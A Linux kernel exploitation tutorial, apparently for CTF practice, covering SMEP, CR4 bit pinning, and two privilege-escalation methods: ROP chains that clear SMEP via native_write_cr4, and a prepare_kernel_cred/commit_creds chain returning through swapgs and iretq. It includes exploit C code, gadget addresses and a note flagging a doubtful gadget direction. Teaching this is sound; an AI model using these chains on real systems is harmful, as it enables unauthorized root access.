Supervisor Mode Execution Prevention (SMEP) is a hardware mitigation, enabled by the Linux kernel, that prevents ret2usr exploits from working. While in kernel mode (ring 0), the CPU cannot execute code from userspace pages. This is a hardware feature offered by Intel chips and is controlled by bit 20 of the CR4 register. There is an equivalent mitigation on ARM devices, called PXN (Privileged Execute-Never). (Also see this article for Android.)
One technique, described in a Google Project Zero post, is to zero out bit 20 of the CR4 register. To do this, Andrey Konovalov used a func(data) primitive to call native_write_cr4(val) with bits 20 and 21 of val (SMEP and SMAP) set to 0.
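To make the bit arithmetic concrete, here is a minimal sketch of how such a value could be derived. The macro and function names are hypothetical (loosely modeled on the kernel's X86_CR4_* naming), and the sample value 0x3006f0 used in the note below is an assumption chosen for illustration; real CR4 contents vary per machine.

```c
/* Bit positions: SMEP is CR4 bit 20, SMAP is CR4 bit 21. */
#define CR4_SMEP (1UL << 20)
#define CR4_SMAP (1UL << 21)

/* Return the given CR4 value with SMEP and SMAP cleared.
 * All other bits are left untouched. (Hypothetical helper.) */
unsigned long cr4_without_smep_smap(unsigned long cr4)
{
    return cr4 & ~(CR4_SMEP | CR4_SMAP);
}
```

For example, a CR4 value of 0x3006f0 has both bits set, and passing it through this helper yields 0x6f0.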
This link to the kernel source shows that native_write_cr4 accepts an arbitrary value and attempts to set the CR4 register to it. However, we can see that the function mentions some bit pinning!
It turns out that the kernel ensures certain bits are not changed after the CPU has finished initializing, and it specifies which bits those are just a couple of lines above this function:
/* These bits should not change their value after CPU init is finished. */
static const unsigned long cr4_pinned_mask =
	X86_CR4_SMEP | X86_CR4_SMAP | X86_CR4_UMIP | X86_CR4_FSGSBASE;
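As a rough illustration of what pinning means for an attacker, the sketch below models the check in plain userspace C. It is not the kernel's code: the helper name, its signature, and the idea of passing the pinned values in as a parameter are assumptions made for the example, and the real function also logs a warning. The bit positions (UMIP 11, FSGSBASE 16, SMEP 20, SMAP 21) follow the Intel CR4 layout.

```c
#include <stdbool.h>

#define X86_CR4_UMIP     (1UL << 11)
#define X86_CR4_FSGSBASE (1UL << 16)
#define X86_CR4_SMEP     (1UL << 20)
#define X86_CR4_SMAP     (1UL << 21)

static const unsigned long cr4_pinned_mask =
    X86_CR4_SMEP | X86_CR4_SMAP | X86_CR4_UMIP | X86_CR4_FSGSBASE;

/*
 * Userspace model of a pinned CR4 write (hypothetical helper).
 * pinned_bits: the values the pinned bits had once CPU init finished.
 * Returns the value that would end up in CR4 and sets *corrected
 * when the requested value tried to change a pinned bit.
 */
unsigned long model_pinned_cr4_write(unsigned long requested,
                                     unsigned long pinned_bits,
                                     bool *corrected)
{
    *corrected = (requested & cr4_pinned_mask) != pinned_bits;
    if (*corrected)
        requested = (requested & ~cr4_pinned_mask) | pinned_bits;
    return requested;
}
```

With SMEP and SMAP pinned on, asking this model to write 0x6f0 gives back 0x3006f0, which is why the CR4 overwrite stops being useful once pinning is in place.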
These changes were introduced in Linux kernel 5.3 here and prevent us from overwriting those bits using this function. For exploits against older kernels (for CTFs) we can still use this technique, and we need to execute a two-gadget ROP chain to call this function.
We need the address of native_write_cr4 and a gadget to fill the RDI register, since it holds the argument the function expects. Using ROPgadget we can find a gadget, and using either our leak from before or a read of /proc/kallsyms we can get the address of native_write_cr4.
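If you go the /proc/kallsyms route, the lookup can be sketched roughly like this. Both function names are hypothetical helpers, and the parser assumes the usual "address type name" line layout of that file.

```c
#include <stdio.h>
#include <string.h>

/*
 * Scan kallsyms-formatted text ("<hex address> <type> <name> [module]")
 * for `name`. Returns the address, or 0 if the symbol is not found.
 */
unsigned long lookup_symbol(FILE *fp, const char *name)
{
    char line[512];
    char sym[256];
    char type;
    unsigned long addr;

    while (fgets(line, sizeof(line), fp) != NULL) {
        if (sscanf(line, "%lx %c %255s", &addr, &type, sym) == 3 &&
            strcmp(sym, name) == 0)
            return addr;
    }
    return 0;
}

/* Convenience wrapper that reads the live /proc/kallsyms file. */
unsigned long kallsyms_lookup(const char *name)
{
    FILE *fp = fopen("/proc/kallsyms", "r");
    unsigned long addr;

    if (fp == NULL)
        return 0;
    addr = lookup_symbol(fp, name);
    fclose(fp);
    return addr;
}
```

Calling kallsyms_lookup("native_write_cr4") returns the symbol's runtime address when the file is readable. Keep in mind that unprivileged readers usually see zeroed addresses when kptr_restrict is enabled, so a return value of 0 can mean either "not found" or "hidden".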
A quick note here on finding ROP gadgets in kernels: make sure you're not running ROPgadget on the bzImage, since that is the entire boot image, which contains the compressed vmlinux kernel image. There is an extract-vmlinux script inside the kernel tree that extracts the vmlinux kernel we want to search for gadgets.
$ ./linux-5.4/scripts/extract-vmlinux linux-5.4/arch/x86/boot/bzImage > vmlinux
$ ROPgadget --binary vmlinux > kernel_gadgets
$ cat kernel_gadgets | grep ': pop rdi ; ret'
0x000000000003be1d : pop rdi ; ret
Using these pieces we can construct a small ROP chain that ends with a jump into our give_me_root function:
unsigned long pop_rdi_ret = 0x3be1d;
unsigned long native_write_cr4_offset = 0x2ddf0;

void overwrite_pc(int fd, unsigned long stack_cookie, unsigned long kernel_base) {
    unsigned long *buf = NULL; //[BUF_SIZE];
    unsigned int cookie_offset = 16;
    int bytes_written;

    buf = malloc(BUF_SIZE);
    if (buf == NULL)
        exit_and_log("Failed to malloc\n");
    memset(buf, '\x00', BUF_SIZE);

    buf[cookie_offset] = stack_cookie;
    buf[cookie_offset + 1] = 0x4141414141414141; // rbx
    buf[cookie_offset + 2] = kernel_base + pop_rdi_ret;
    buf[cookie_offset + 3] = 0x6f0; // or 0x407f0
    /*
     * 0x407f0 -> 0b1000000011111110000
     * 0x6f0   -> 0b11011110000
     */
    buf[cookie_offset + 4] = kernel_base + native_write_cr4_offset;
    // Once SMEP is off, we can return to userspace pages again!
    buf[cookie_offset + 5] = (unsigned long)give_me_root;

    // After this write we won't return to the
    // rest of this function
    bytes_written = write(fd, buf, BUF_SIZE);
    printf("Write returned %d\n", bytes_written);
    free(buf);
}
If SMEP bit is pinned
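If the SMEP bit is pinned, we can't overwrite that part of the CR4 register with our own value, so we need to ROP our prepare_kernel_cred and commit_creds calls instead. The steps are straightforward. We need to implement the following sequence as a ROP chain: load 0 into RDI and call prepare_kernel_cred, move the returned cred pointer from RAX into RDI, call commit_creds, then execute swapgs and iretq to return to userspace.
Running the previous ret2usr payload on a kernel with the SMEP bit pinned will result in a kernel panic.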
The process of generating the ROP chain for a given kernel is pretty straightforward, and you shouldn't run into any road bumps. My code for the overflow is shown here and below:
// 0xffffffff8103be1d : pop rdi ; ret
unsigned long pop_rdi_ret = 0xffffffff8103be1d;
// 0xffffffff81033b50 : mov rax, rdi ; ret
unsigned long mov_rax_rdi = 0xffffffff81033b50;
// 0xffffffff81c00eaa : swapgs ; popfq ; ret
unsigned long swapgs_popfq_ret = 0xffffffff81c00eaa;
// ffffffff810240c2: 48 cf iretq
unsigned long iretq = 0xffffffff810240c2;

void overwrite_pc(int fd, unsigned long stack_cookie, unsigned long kernel_base) {
    unsigned long *buf = NULL; //[BUF_SIZE];
    unsigned int cookie_offset = 16;
    int bytes_written;

    buf = malloc(BUF_SIZE);
    if (buf == NULL)
        exit_and_log("Failed to malloc\n");
    memset(buf, '\x00', BUF_SIZE);

    user_rip = (unsigned long)drop_shell;

    buf[cookie_offset] = stack_cookie;
    buf[cookie_offset + 1] = 0x4141414141414141; // rbx
    buf[cookie_offset + 2] = pop_rdi_ret;
    buf[cookie_offset + 3] = 0; // Argument for prepare_kernel_cred
    buf[cookie_offset + 4] = prepare_kernel_cred;
    // Move cred struct to argument. NOTE: commit_creds takes the cred
    // pointer in rdi, and ROPgadget prints Intel syntax (destination
    // first), so double-check that this gadget copies rax into rdi.
    buf[cookie_offset + 5] = mov_rax_rdi;
    buf[cookie_offset + 6] = commit_creds;
    buf[cookie_offset + 7] = swapgs_popfq_ret;
    buf[cookie_offset + 8] = 0xDEADBEEF; // value for popfq
    buf[cookie_offset + 9] = iretq; // swap from kernel to userspace
    buf[cookie_offset + 10] = user_rip; // <-- here is drop shell function
    buf[cookie_offset + 11] = user_cs;
    buf[cookie_offset + 12] = user_rflags;
    buf[cookie_offset + 13] = user_sp;
    buf[cookie_offset + 14] = user_ss;

    // After this write we won't return to the
    // rest of this function
    bytes_written = write(fd, buf, BUF_SIZE);
    printf("Write returned %d\n", bytes_written);
    free(buf);
}
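The last five slots of the chain form the frame that iretq pops, and their order matters: RIP, CS, RFLAGS, RSP, SS. As a small sketch, that layout can be captured in a helper so the order is written down once. The helper and enum names are hypothetical, and the user_* values are assumed to have been saved earlier while still running in userspace.

```c
#include <stddef.h>

/* Order in which iretq pops values off the stack in 64-bit mode. */
enum {
    IRET_RIP,
    IRET_CS,
    IRET_RFLAGS,
    IRET_RSP,
    IRET_SS,
    IRET_FRAME_WORDS
};

/*
 * Write an iretq frame into chain[] starting at index `at`.
 * Returns the index of the first slot after the frame.
 * (Hypothetical helper; the caller must ensure chain[] is large enough.)
 */
size_t put_iret_frame(unsigned long *chain, size_t at,
                      unsigned long rip, unsigned long cs,
                      unsigned long rflags, unsigned long rsp,
                      unsigned long ss)
{
    chain[at + IRET_RIP]    = rip;
    chain[at + IRET_CS]     = cs;
    chain[at + IRET_RFLAGS] = rflags;
    chain[at + IRET_RSP]    = rsp;
    chain[at + IRET_SS]     = ss;
    return at + IRET_FRAME_WORDS;
}
```

In the function above, a call such as put_iret_frame(buf, cookie_offset + 10, user_rip, user_cs, user_rflags, user_sp, user_ss) would fill the same five slots as the hand-written assignments.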